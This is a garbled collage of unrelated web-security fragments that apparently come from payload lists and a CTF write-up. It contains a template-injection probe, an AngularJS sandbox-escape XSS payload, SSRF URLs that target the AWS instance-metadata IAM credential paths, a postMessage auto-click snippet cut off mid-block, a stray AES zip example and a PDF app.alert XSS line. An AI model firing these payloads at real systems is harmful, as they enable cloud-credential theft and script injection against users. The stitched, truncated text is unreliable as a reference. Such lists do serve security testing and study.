{{7*7}}
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
| ## IPv6 Tests | |
| http://[::ffff:169.254.169.254] | |
| http://[0:0:0:0:0:ffff:169.254.169.254] | |
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
Application was built from 2 parts - frontend page (https://h4x0rs.club/game/) and backend page (https://backend.h4x0rs.club/backend_www/), communicating via postMessage. There were several issues:
It's also possible to make victim browser trigger a click on injected element
if(location.hash.slice(1) == 'report'){
document.getElementById('report-btn').click();
| import zipfile | |
| import zipfile_aes | |
| secret_password = b'lost art of keeping a secret' | |
| with zipfile_aes.AESZipFile('new_test.zip', | |
| 'w', | |
| compression=zipfile.ZIP_LZMA, | |
| encryption=zipfile_aes.WZ_AES) as zf: | |
| zf.setpassword(secret_password) |
| app.alert("XSS") |
Some notes and tools for reverse engineering / deobfuscating / unminifying obfuscated web app code.